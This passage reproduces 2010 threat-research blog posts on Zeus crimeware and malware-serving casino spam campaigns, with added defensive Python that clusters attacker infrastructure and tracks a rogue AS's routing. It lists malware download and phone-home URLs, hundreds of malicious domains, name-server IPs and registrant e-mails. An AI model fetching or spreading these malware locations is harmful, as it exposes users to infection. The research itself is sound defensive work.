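        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_by_infrastructure(records):
    """Return a list of sorted domain lists. Two domains land in the same cluster
    when they share a registrant e-mail or a name-server IP, directly or through
    a chain of such links."""
    uf = UnionFind()
    for domain, email, _ns, ns_ip in records:
        uf.find(domain)
        # Pivot keys are namespaced so an e-mail string can never collide with an IP.
        if email:
            uf.union(domain, "email:" + email.lower())
        uf.union(domain, "ip:" + ns_ip)
    groups = defaultdict(list)
    for domain, _, _, _ in records:
        groups[uf.find(domain)].append(domain)
    return sorted((sorted(g) for g in groups.values()), key=lambda g: g[0])


def pivot_summary(records):
    """Map each name-server IP to the name servers and registrant e-mails seen
    behind it; this is what 'parked on the same IP as previous campaigns' means."""
    summary = defaultdict(lambda: {"name_servers": set(), "emails": set()})
    for _domain, email, ns, ns_ip in records:
        summary[ns_ip]["name_servers"].add(ns)
        if email:
            summary[ns_ip]["emails"].add(email.lower())
    return {ip: {k: sorted(v) for k, v in d.items()} for ip, d in summary.items()}


def blocklist(records):
    """Flat, de-duplicated list of every indicator worth blocking:
    spamvertised domains, name-server hostnames and name-server IPs."""
    items = set()
    for domain, _email, ns, ns_ip in records:
        items.update({domain, ns, ns_ip})
    return sorted(items)


if __name__ == "__main__":
    for group in cluster_by_infrastructure(RECORDS):
        print("cluster:", ", ".join(group))
    for ip, info in sorted(pivot_summary(RECORDS).items()):
        print(ip, info)
    print(len(blocklist(RECORDS)), "indicators")
```

On the sample records the three Korean typosquat batches that the post dates separately (renya*/esub* on 89.238.165.195, dese*/edasa* on 87.117.245.9) collapse into one cluster per name-server IP, while the casino domain stays on its own; registrant e-mail alone would have kept esub.co.kr and renya.co.kr apart, which is why the IP pivot is the one that exposes campaign continuity.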


Interestingly, researchers from [29]M86 Security gained access to the web malware exploitation kit used in a previous campaign:

"It has been up and running and serving exploits for nearly a day. In this time almost 40,000 unique users have been exposed to these exploits, and the Zeus file has been downloaded over 5000 times. These downloads do not include the PhotoArchive.exe file downloads that a user may be tricked into downloading and executing themselves."

Updates will be posted as soon as new developments emerge.

Related coverage of the gang's previous campaigns: 

[30] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[31] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[32] Facebook/AOL Update Tool Spam Campaign Serving 
Crimeware and Client-Side Exploits 

[33] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[34] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[35] Pushdo Injecting Bogus Swine Flu Vaccine 



[36] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[37] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[38] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

This post has been reproduced from [39]Dancho Danchev's blog. Follow him [40]on Twitter.

1. http://www.virustotal.com/analisis/96682f571e65f509170992e5b53b280edcb0b1e85013a180b6fd1afd6fd877e1-1267056760

2. http://www.virustotal.com/analisis/2ab5e1c53bfd6dc914c7962da535f6e137c7f417d6187d8b01b917088536fd44-1267056805

3. http://www.virustotal.com/analisis/f72cf75417e21eecf8defa1a52a9601c4eb4dbfd3961e782bd1c0aa0157ce8fc-1267050041

4. http://www.virustotal.com/analisis/84ea1092d66c937771da9801505eb1b7f926e416d34d7f8a43d457f2e4c33ada-1267050223

5. http://www.virustotal.com/analisis/ef120bf9f7791f0acefb05d4628d2c2d87999938fdb9f3152142436bc321ec05-1266691798

6. http://www.virustotal.com/analisis/ea81a121b75fe8ad2e445cd13a6350850de2bf21cdb6d1dc4eac247b2aac3a40-1266708037

7. http://www.virustotal.com/analisis/1983abeb8001365952fe06814ab6a676acebac0b1cbf4f3d2030de424b0de130-1266691316

8. http://www.virustotal.com/analisis/f4d19dca77a571b73eae1f0c3640db81cc257472f1cc9e3f1ca0376216df4a91-1266691333

9. http://www.virustotal.com/analisis/de54327ae5b208f1f45704d41ef03c02758f7f12c2f63907db70429629c44df3-1266691345

10. http://www.virustotal.com/analisis/36e91b84b8e3f83a8044d3c375398d9840dce4f12d6c312f417e98f696dc34e0-1266691352

11. http://www.virustotal.com/analisis/6a0295a38536274beca2af613afbadabbdd29cbfb669942b02aec810d68ff019-1266691365

12. http://www.virustotal.com/analisis/7556ad16c7507777c21a73ebcc5d5ff3661f5e44a98899f117aa96bc3246f1fd-1266425345

13. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

14. http://irs/PhotoArchive%20Themed%20Zeus/Client-Side%20Exploits%20Serving%20Campaign%20in%20the%20Wild

15. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659

16. http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992

17. http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-0015

18. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927

19. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324

20. http://www.virustotal.com/analisis/3d393354d40fc2a64cb68fe9fa51c575dab1af87065abbef811dd4d7e051db07-1266275738

21. http://www.virustotal.com/analisis/3aaa85a66689a9c09243127b0831e7294b3db191ce0c3e81ebc871fe843506fc-1266268338

22. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

23. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

24. https://zeustracker.abuse.ch/monitor.php?as=42229

25. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

26. http://www.virustotal.com/analisis/f72cf75417e21eecf8defa1a52a9601c4eb4dbfd3961e782bd1c0aa0157ce8fc-1266268334

27. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

28. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

29. http://www.m86security.com/trace/traceitem.asp?article=1233

30. http://ddanchev.blogspot.com/2010/02/tax-report-themed-zeusclient-side.html

31. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

32. http://ddanchev.blogspot.com/2010/01/facebookaol-update-tool-spam-campaign.html

33. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

34. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

35. http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html

36. http://ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.html

37. http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html

38. http://ddanchev.blogspot.com/2009/07/multitasking-fast-flux-botnet-that.html

39. http://ddanchev.blogspot.com/

40. http://twitter.com/danchodanchev
Over the past week and a half, cybercriminals have been aggressively spamvertising a growing portfolio of domains, relying on deceptive advertising for nonexistent and fraudulent online gambling web sites, serving the well known Win32.GAMECasino.

• Go through related posts: [1]Don't Play Poker on an Infected Table; [2]Malware (Client-Side Exploits) Serving Online Casinos

What's particularly interesting about the campaign is the fact that all of the domains serve an identical template, with the SmartDownload.exe binary hosted "in the cloud" thanks to Amazon's Web Services (anat.s3.amazonaws.com/dir4/SmartDownload.exe).

Detection rate for SmartDownload.exe - [3]Win32.GAMECasino - Result: 10/42 (23.81 %).

The sample phones back to the following domain - download.realtimegaming.com /cdn/goldvipclub/package list.ini.zip?fakeParam=1 - 212.201.100.144 - Email: admin@REALTIMEGAMING.COM; RealTime Gaming Holding Company, LLC, registered under the following address according to the information published on their web site:

• For Licensing opportunities or Company Information, please submit request to Hasting B.V. Click Here. Hastings International B.V. New Haven Office Center Emancipatie Boulevard 31 - P.O. Box 6052 Curacao Netherlands Antilles

Here are the spamvertised domains in question, including the name servers involved.

Spamvertised domains parked on 116.123.221.17; 
112.159.237.58: 

aerojackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
compujackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotadvance.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotalist.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotbee.net - Email: dfgdfgvcsxl2@foxmail.com
jackpotbuzz.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotcanyon.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotclubs.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotfairy.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotfan.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotflag.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpoticity.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotjets.net - Email: dfgdfgvcsxl2@foxmail.com
jackpotlodge.net - Email: dfgdfgvcsxl2@foxmail.com
jackpotmoment.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotpair.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotrocket.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotthink.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpottodoor.net - Email: dfgdfgvcsxl2@foxmail.com 
jackpotwire.net - Email: dfgdfgvcsxl2@foxmail.com 
jacpotcongress.net - Email: dfgdfgvcsxl2@foxmail.com 
linejackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
lux777cazino.net - Email: efghfgbvghfgh@qq.com 
majicjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
midjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
mixerjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
needjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
nestjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
shopjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
smart-nest.net - Email: dfgdsfvcb@163.com 
structjackpot.net - Email: dfgdfgvcsxl2@foxmail.com 
the-cash.net - Email: dfgdsfvcb@163.com
thejackpots.net - Email: dfgdfgvcsxl2@foxmail.com
windowjackpots.net - Email: dfgdfgvcsxl2@foxmail.com 
win-vox.net - Email: dfgdsfvcb@163.com 
aerowin.net - Email: dfgdsfvcb@163.com 
beach-jackpot.net - Email: dfgdsfvcb@163.com 
beautyselite.net - Email: dfgdsfvcb@163.com 
binwin.net - Email: dfgdsfvcb@163.com 
clashflash.net - Email: dfgdsfvcb@163.com 
couldwin.net - Email: dfgdsfvcb@163.com 
dinwin.net - Email: dfgdsfvcb@163.com 
eliteclasss.net - Email: dfgdsfvcb@163.com 
eliteorder.net - Email: dfgdsfvcb@163.com 
eliteplaza.net - Email: dfgdsfvcb@163.com 
elitescoop.net - Email: dfgdsfvcb@163.com 
eliteweird.net - Email: dfgdsfvcb@163.com 
ezelite.net - Email: dfgdsfvcb@163.com 
flashapex.net - Email: dfgdsfvcb@163.com 
flashbrook.net - Email: dfgdsfvcb@163.com 
flashbuzzs.net - Email: dfgdsfvcb@163.com 
flashcensus.net - Email: dfgdsfvcb@163.com 
flashclashs.net - Email: dfgdsfvcb@163.com
flashlasch.net - Email: dfgdsfvcb@163.com 
flashlash.net - Email: dfgdsfvcb@163.com 
flashmoment.net - Email: dfgdsfvcb@163.com 
flashnest.net - Email: dfgdsfvcb@163.com 
flashpixie.net - Email: dfgdsfvcb@163.com 
flashslash.net - Email: dfgdsfvcb@163.com 
flashspark.net - Email: dfgdsfvcb@163.com 
flashspell.net - Email: dfgdsfvcb@163.com 
flashzap.net - Email: dfgdsfvcb@163.com 
free-smart.net - Email: dfgdsfvcb@163.com 
ginwin.net - Email: dfgdsfvcb@163.com 
goingtowins.net - Email: dfgdsfvcb@163.com 
hitecwinner.net - Email: dfgdsfvcb@163.com 
innerwinner.net - Email: dfgdsfvcb@163.com 
interelite.net - Email: dfgdsfvcb@163.com 
jackpot-direct.net - Email: dfgdsfvcb@163.com 
jackpot-fire.net - Email: dfgdsfvcb@163.com
jackpot-help.net - Email: dfgdsfvcb@163.com
jackpot-infinity.net - Email: dfgdsfvcb@163.com 
jackpot-mind.net - Email: dfgdsfvcb@163.com 
jackpot-minute.net - Email: dfgdsfvcb@163.com 
jackpot-phone.net - Email: dfgdsfvcb@163.com 
jackpot-reunion.net - Email: dfgdsfvcb@163.com 
jackpot-senate.net - Email: dfgdsfvcb@163.com 
jackpot-talk.net - Email: dfgdsfvcb@163.com 
jackpot-taven.net - Email: dfgdsfvcb@163.com
jackpot-topia.net - Email: dfgdsfvcb@163.com 
jackpot-wire.net - Email: dfgdsfvcb@163.com 
laschflash.net - Email: dfgdsfvcb@163.com 
learn-jackpot.net - Email: dfgdsfvcb@163.com 
magicwinner.net - Email: dfgdsfvcb@163.com 
mapwinner.net - Email: dfgdsfvcb@163.com 
mediaselite.net - Email: dfgdsfvcb@163.com 
mindelite.net - Email: dfgdsfvcb@163.com 
mrelite.net - Email: dfgdsfvcb@163.com
needwin.net - Email: dfgdsfvcb@163.com
pixiewinner.net - Email: dfgdsfvcb@163.com 
powerwinners.net - Email: dfgdsfvcb@163.com 
predict-jackpot.net - Email: dfgdsfvcb@163.com 
pushelite.net - Email: dfgdsfvcb@163.com 
reseachelite.net - Email: dfgdsfvcb@163.com 
sellelite.net - Email: dfgdsfvcb@163.com 
sgameelite.net - Email: dfgdsfvcb@163.com 
sharpwinner.net - Email: dfgdsfvcb@163.com
smart-enough.net - Email: dfgdsfvcb@163.com 
smart-fire.net - Email: dfgdsfvcb@163.com 
smart-log.net - Email: dfgdsfvcb@163.com 
smart-nest.net - Email: dfgdsfvcb@163.com 
smart-spree.net - Email: dfgdsfvcb@163.com 
steelites.net - Email: dfgdsfvcb@163.com 
surveylite.net - Email: dfgdsfvcb@163.com 
targetelite.net - Email: dfgdsfvcb@163.com 
theelites.net - Email: dfgdsfvcb@163.com 
theflashers.net - Email: dfgdsfvcb@163.com
theywin.net - Email: dfgdsfvcb@163.com
velowinner.net - Email: dfgdsfvcb@163.com 
vote-smart.net - Email: dfgdsfvcb@163.com 
wanttowin.net - Email: dfgdsfvcb@163.com 
winbot.net - Email: dfgdsfvcb@163.com 
winnercrest.net - Email: dfgdsfvcb@163.com 
winnerfast.net - Email: dfgdsfvcb@163.com 
winnerhut.net - Email: dfgdsfvcb@163.com 
winnerincumbent.net - Email: dfgdsfvcb@163.com 
winnermass.net - Email: dfgdsfvcb@163.com 
winnerpub.net - Email: dfgdsfvcb@163.com 
winnerrocket.net - Email: dfgdsfvcb@163.com 
winnersalon.net - Email: dfgdsfvcb@163.com 
winnerscan.net - Email: dfgdsfvcb@163.com 
winnertake.net - Email: dfgdsfvcb@163.com 
winnertal.net - Email: dfgdsfvcb@163.com 
winnertoyou.net - Email: dfgdsfvcb@163.com 
zap-smart.net - Email: dfgdsfvcb@163.com

Name servers of notice:

ns1.bb6ns.com - 58.83.8.45 - Email: li-zhenshu@163.com

ns1.bedws.com - 218.61.126.28 - Email: guoxiufenghy@163.com

ns1.catdogns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns1.cebht.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns1.dd5ns.com - 61.191.191.61 - Email: li-zhenshu@163.com

ns1.dogmens.com - 208.78.242.185 - Email: hmr@data99.com

ns1.euromarketorder.com - 218.61.126.28

ns1.fesws.com - 218.61.126.28 - Email: info2@data99.com

ns1.goatdns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns1.hh7ns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns1.kindball.com - 218.61.126.28 - Email: zhaokaijunlp@163.com

ns1.mm8ns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns1.nn4ns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns1.ss6ns.com - 61.191.191.61 - Email: shirley9127@hotmail.com

ns1.wildnn.com - 208.78.242.185 - Email: hmr@data99.com

ns2.gg9ns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns2.sruisorehoes.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns2.zz8ns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns3.bavns.com - 218.61.126.28 - Email: shirley9127@hotmail.com

ns3.bawns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns3.becns.com - 218.61.126.28 - Email: li-zhenshu@163.com

ns3.bojns.com - 218.61.126.28 - Email: li-zhenshu@163.com

The campaign is a great example of cybercrime-friendly affiliate networks, with the cybercriminals in this case investing a modest amount of money in the actual spamming process, and then earning a 30 % flat rate, which can also scale between 20 % and 45 % depending on their choice.

The practice has been around for years. Here are three monetization strategies seen within the last two years, all of which remain an active tactic for fraudsters to take advantage of:

• Brandjacking and monetizing through pseudo-value added crapware applications - this practice has been profiled in a previous analysis, "[4]Cybersquatting Security Vendors for Fraudulent Purposes". PandaSecurity's reaction back then? Immediate notification of their legal department.

• SMS micro-payment scams through typosquatting and brandjacking - this tactic has already been profiled in the "[5]Legitimate Software Typosquatted in SMS Micro-Payment Scam" analysis. Compared to the typosquatting in the previous scheme, this campaign was monetizing freely available software.

• Abuse of legitimate affiliate networks - In January, 2009, I [6]profiled and took down a campaign that has typosquatted domains for popular applications and was advertising them through Google's AdSense in an attempt to earn money from a legitimate affiliate network - [7]Conduit's Rewards Program. The abuse of these networks can be easily taken care of, since the cybercriminal that's violating their Terms of Service is exposing himself as a legitimate user, with his very own CampaignID.

You may want to reconsider using an online gambling application that's being spammed using a botnet, with the actual application crypted using a tool exclusively used by malware authors in an attempt to bypass signature-based antivirus scanning.

Amazon's Web Services are aware of this campaign. Action against it should be taken shortly.

This post has been reproduced from [8]Dancho Danchev's blog. Follow him [9]on Twitter.

1. http://ddanchev.blogspot.com/2007/09/dont-play-poker-on-infected-table.html

2. http://ddanchev.blogspot.com/2007/11/malware-serving-online-casinos.html

3. http://www.virustotal.com/analisis/2488c1252a5b3207d7afb9b6e14ebb38ff3abcd44aba0de1055db88b2b2416b8-1267093771

4. http://ddanchev.blogspot.com/2008/03/cybersquatting-security-vendors-for.html

5. http://ddanchev.blogspot.com/2009/07/legitimate-software-typosquatted-in-sms.html

6. http://ddanchev.blogspot.com/2009/01/exposing-fraudulent-google-adwords.html

7. http://www.conduit.com/

8. http://ddanchev.blogspot.com/

9. http://twitter.com/danchodanchev
Fotolog's FTLog Malware Campaign Serves Bogus Video Codecs (2010-02-26 00:02)
Summarizing Zero Day's Posts for February (2010-03-02 21:20)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for February, 2010. You [2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS feed, [5]Zero Day's main feed, [6]follow me or all of [7]ZDNet's blogs on Twitter.

Recommended reading - [8]Reports: SQL injection attacks and malware led to most data breaches; [9]Report: Malicious PDF files comprised 80 percent of all exploits for 2009 and [10]10 things you didn't know about the Koobface gang

01. [11]Does Blippy really pose a security risk?

02. [12]Reports: SQL injection attacks and malware led to 
most data breaches 

03. [13]Scammers phishing for sensitive iPhone data 


04. [14]Report: Malicious PDF files comprised 80 percent of 
all exploits for 2009 

05. [15]The Kneber botnet - FAQ 

06. [16]10 things you didn't know about the Koobface gang 

This post has been reproduced from [17]Dancho Danchev's 
blog. Follow him [18]on Twitter. 

1. http://blogs.zdnet.com/security

2. http://ddanchev.blogspot.com/2010/01/summarizing-zero-days-posts-for.html

3. http://ddanchev.blogspot.com/2010/02/summarizing-zero-days-posts-for-january.html

4. http://updates.zdnet.com/tags/dancho+danchev.html?t=0&s=0&o=1&mode=rss

5. http://feeds.feedburner.com/zdnet/security

6. http://twitter.com/danchodanchev

7. http://twitter.com/zdnetblogs

8. http://blogs.zdnet.com/security/?p=5421

9. http://blogs.zdnet.com/security/?p=5473

10. http://blogs.zdnet.com/security/?p=5452

11. http://blogs.zdnet.com/security/?p=5401

12. http://blogs.zdnet.com/security/?p=5421

13. http://blogs.zdnet.com/security/?p=5460

14. http://blogs.zdnet.com/security/?p=5473

15. http://blogs.zdnet.com/security/?p=5508

16. http://blogs.zdnet.com/security/?p=5452

17. http://ddanchev.blogspot.com/

18. http://twitter.com/danchodanchev




Don't Play Poker on an Infected Table - Part Three 
(2010-03-09 22:43) 

The monetization of phony online gambling networks - clearly tolerating systematic violation of their TOS - is continuing, with the scammers behind last month's campaign ([1]Don't Play Poker on an Infected Table - Part Two) spamvertising another portfolio of domains using new templates. 

It's worth pointing out that the spammers don't just earn revenue every time someone installs the application, but also every time the now-converted visitor interacts financially with the service, a monetization approach you'll see in the attached screenshots. 

Detection rates for the spamvertised binaries (downloaded from gamez-lux.com and we3tt.com): 

[2]StarsVIPCasino_Setup.exe - Result: 14/42 (33.33 %); 
[3]GoldenMummyEN.exe - Result: 9/42 (21.43 %); 
[4]RubyRoyaleEN.exe - Result: 11/42 (26.19 %). 

Sample phone back locations: download.thepalacegroupgaming.com; pcm3.valueactive.eu; rubyfortune.mgsmup.com 
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Spamvertised domains include: 

adrembovesttes.net - Email: pengjiajie222@163.com 
bonuscasinoslux.net - Email: fgsdvbbvd@qq.com 
bonusgameslux.net - Email: fgsdvbbvd@qq.com 
bonusluxcasinos.net - Email: fgsdvbbvd@qq.com 
bonusluxplays.net - Email: fgsdvbbvd@qq.com 
bonusplayslux.net - Email: fgsdvbbvd@qq.com 
casinosbonuslux.net - Email: fgsdvbbvd@qq.com 
casinosluxclub.net - Email: fgsdvbbvd@qq.com 
casinosluxstar.net - Email: fgsdvbbvd@qq.com 
clopelinesutes.net - Email: fgsdvbbvd@qq.com 
clubgameslux.net - Email: fgsdvbbvd@qq.com 
clubluxgames.net - Email: fgsdvbbvd@qq.com 
club-of-lux.net - Email: fgsdvbbvd@qq.com 
clubs-play.net - Email: fgsdvbbvd@qq.com 


clubvegas-games.net - Email: fgsdvbbvd@qq.com 
gameclubviva.net - Email: fgsdvbbvd@qq.com 
game-lux-club.net - Email: fgsdvbbvd@qq.com 
gamesbonuslux.net - Email: fgsdvbbvd@qq.com 
games-gold.net - Email: fgsdvbbvd@qq.com 
gameslux.net - Email: fgsdvbbvd@qq.com 
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gamesstarlux.net - Email: fgsdvbbvd@qq.com 
gamevivagold.net - Email: fgsdvbbvd@qq.com 
gorxshop.net - Email: sdfxckj@msn.com 
hannoweramtes.net - Email: ftyughsere@qq.com 
lutiok.net - Email: ftgy23fge@126.com 
luxbonusgames.net - Email: fgsdvbbvd@qq.com 
luxbonusplays.net - Email: fgsdvbbvd@qq.com 
luxcasinosbonus.net - Email: fgsdvbbvd@qq.com 
luxclubcasinos.net - Email: fgsdvbbvd@qq.com 
luxclubplays.net - Email: fgsdvbbvd@qq.com 
luxgamesbonus.net - Email: fgsdvbbvd@qq.com 
luxgamesstar.net - Email: fgsdvbbvd@qq.com 
luxplaysclub.net - Email: fgsdvbbvd@qq.com 
luxplaysstar.net - Email: fgsdvbbvd@qq.com 
luxs-games.net - Email: fgsdvbbvd@qq.com 
luxstarplays.net - Email: fgsdvbbvd@qq.com 
mollehoukutes.net - Email: guoaiwense@163.com 
murgadobarotes.net - Email: guoaiwense@163.com 
namedosaras.net - Email: ftyughsere@qq.com 
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pay3500win.net - Email: dfgdvbcv@sina.com 
playeuro777.net - Email: fghvvbcfgds@tom.com 
playeuro888.net - Email: fghvvbcfgds@tom.com 
playglobal777.net - Email: dfhhjg4ee@163.com 
playsclublux.net - Email: fgsdvbbvd@qq.com 
playsluxclub.net - Email: fgsdvbbvd@qq.com 
realcash-mine.net - Email: dfgdvbcv@sina.com 
realcash-offer.net - Email: dfgdvbcv@sina.com 
realcash-wins.net - Email: dfgdvbcv@sina.com 
regal-jackpot.net - Email: dfgdvbcv@sina.com 
regalvegas-online.net - Email: dfgdvbcv@sina.com 


royalcasino777.net - Email: edwfrsdf@126.com 

royalcasino888.net - Email: edwfrsdf@126.com 

royalvegas-play.net - Email: dfgdvbcv@sina.com 

satregonovates.net - Email: pengjiajie222@163.com 

softaserutes.net - Email: ftyughsere@qq.com 

softoutnertes.net - Email: ftyughsere@qq.com 

softuoplowtes.net - Email: ftyughsere@qq.com 

stargameslux.net - Email: ftyughsere@qq.com 

starluxcasinos.net - Email: ftyughsere@qq.com 

sundowutortes.net - Email: guoaiwense@163.com 

vegasclubsgame.net - Email: fgsdvbbvd@qq.com 

vegasgamesclub.net - Email: fgsdvbbvd@qq.com 

Sample monetization in action: 
Phony affiliate networks reserve the right to shift responsibility for the malicious activity onto participants who violate their Terms of Service - a violation that, in the meantime, earned both parties significant amounts of money. 

The "don't play poker on an infected table" series is likely to expand. 


Related posts: 

[5] Don't Play Poker on an Infected Table - Part Two 

[6] Don't Play Poker on an Infected Table 

[7] Malware Serving Online Casinos 

This post has been reproduced from [8]Dancho Danchev's blog. Follow him [9]on Twitter. 

1. http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html 

2. http://www.virustotal.com/analisis/ad58e2bfc9a66e15b3138 

3. http://www.virustotal.com/analisis/9bbda63b61d7b94f8b5bbf94da7eca948422af758ab6690fe30ed7f27e71200e-1268161379 

5. http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html 
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AS50215 Troyak-as Taken Offline, Zeus C&Cs Drop 
from 249 to 181 (2010-03-10 21:01) 

2nd update for Friday, March 12, 2010 - [1]Troyak-AS is down again: "This AS is not currently used to announce prefixes in the global routing table, nor is it used as a visible transit AS." 

UPDATED: Friday, March 12, 2010 - Troyak-AS peering courtesy of [2]AS25189 - NLINE-AS JSC Nline. Since the entire Troyak-as takedown campaign is turning into an infinite loop, it's time for a "terminating condition". 

2nd update for Thursday, March 11, 2010: Troyak-AS is back from the dead. Upstream courtesy of [3]AS8342 - RTCOMM-AS RTComm.RU Autonomous System. The good news? Troyak's Zeus C&Cs are still offline. 

UPDATED: Thursday, March 11, 2010 - [4]TROYAK-AS Starchenko Roman Fedorovich is dead again: "This AS is not currently used to announce prefixes in the global routing table, nor is it used as a visible transit AS." 

UPDATED: Troyak-as is now [5]AS44051 YA-AS Professional Communication Systems. 

[6]AS50215 Troyak-as, the cybercrime-friendly virtual neighborhood that was a key component in the hosting infrastructure for all of the Zeus-crimeware serving campaigns during Q1 of 2010, has been taken offline, resulting in a pretty evident drop in Zeus C&Cs, according to this graph courtesy of the [7]ZeusTracker. 

AS50215 Troyak-as (ctlan.net; prombd.net) was of course the tip of the iceberg, directly or indirectly interacting with the following ASs: 

• AS31366 - smallshop-as Stebluk Vladimir Vladimirovich bid 

• AS44107 - PROMBUDDETAL-AS Prombuddetal LLC 

• AS50369 - VISHCLUB-as Kanyovskiy Andriy 

• AS49934 - VVPN-AS PE Voronov Evgen Sergiyovich 

• AS47560 - VESTEH-NET-as Vesteh LLC 
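The dated updates at the top of this post track AS50215 falling out of the global routing table, reappearing behind a new upstream (AS44051, then AS8342, then AS25189) and disappearing again, with each state read off the AS report by hand. The Python below is an added example and not code from the post: given AS_PATH strings as a route collector exports them, it reports whether the target AS is still visible, whether it originates or transits prefixes, which ASes sit directly upstream of it, and what changed between two snapshots, so the "terminating condition" becomes a check rather than a re-read. The three snapshots are constructed: the prefixes are RFC 5737 documentation ranges and AS64496-AS64501 are documentation ASNs; only AS50215 and the upstream and customer ASNs named in this post are real.

```python
# Constructed route-collector snapshots: prefix, then AS_PATH with the collector
# side first and the origin last. Prefixes are RFC 5737 documentation ranges and
# AS64496-AS64501 are documentation ASNs; AS50215, AS44051, AS8342, AS25189,
# AS44107 and AS49934 are the ASNs named in the post.
SNAPSHOT_BEFORE = """
# prefix            AS_PATH
192.0.2.0/24        AS64500 AS44051 AS50215 AS44107
198.51.100.0/24     AS64500 AS44051 AS50215 AS49934
203.0.113.0/24      AS64501 AS44051 AS50215
203.0.113.0/24      AS64500 AS44051 AS50215
192.0.2.0/25        AS64501 AS64496 AS64497      # unrelated route, control
"""

SNAPSHOT_DOWN = """
192.0.2.0/25        AS64501 AS64496 AS64497
"""

SNAPSHOT_REPEERED = """
192.0.2.0/24        AS64500 AS8342 AS50215 AS44107
203.0.113.0/24      AS64501 AS25189 AS50215
192.0.2.0/25        AS64501 AS64496 AS64497
"""


def parse_routes(text):
    """Return a list of (prefix, [asn, ...]) from the snapshot format above."""
    routes = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and the header
        if not line:
            continue
        prefix, *path = line.split()
        if path:
            routes.append((prefix, path))
    return routes


def visibility(routes, target):
    """Summarise how `target` appears in a snapshot.

    Upstreams are the ASes adjacent to the target on the collector side of the
    path (who is giving it transit); downstreams are the ASes it transits for.
    """
    prefixes, upstreams, downstreams = set(), set(), set()
    origin_paths = transit_paths = 0
    for prefix, path in routes:
        if target not in path:
            continue
        prefixes.add(prefix)
        i = path.index(target)
        if i == len(path) - 1:
            origin_paths += 1
        else:
            transit_paths += 1
            downstreams.add(path[i + 1])
        if i > 0:
            upstreams.add(path[i - 1])
    return {
        "visible": bool(prefixes),
        "prefixes": len(prefixes),
        "origin_paths": origin_paths,
        "transit_paths": transit_paths,
        "upstreams": sorted(upstreams),
        "downstreams": sorted(downstreams),
    }


def upstream_changes(before, after, target):
    """Which upstreams the target gained or lost between two snapshots."""
    b = set(visibility(before, target)["upstreams"])
    a = set(visibility(after, target)["upstreams"])
    return {"gained": sorted(a - b), "lost": sorted(b - a)}


def takedown_complete(routes, target):
    """The 'terminating condition': no path in the snapshot carries the target."""
    return not visibility(routes, target)["visible"]


if __name__ == "__main__":
    target = "AS50215"
    for name, snap in (("before", SNAPSHOT_BEFORE), ("down", SNAPSHOT_DOWN),
                       ("re-peered", SNAPSHOT_REPEERED)):
        print(name, visibility(parse_routes(snap), target))
    print(upstream_changes(parse_routes(SNAPSHOT_BEFORE),
                           parse_routes(SNAPSHOT_REPEERED), target))
```

Run against successive snapshots, a non-empty "gained" list is exactly the "back from the dead, upstream courtesy of ..." event the updates describe, and the upstream it names is the next party to contact.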

Don't pop the corks just yet: their customers, in particular their money mule recruitment customers, are already migrating to the competition. 

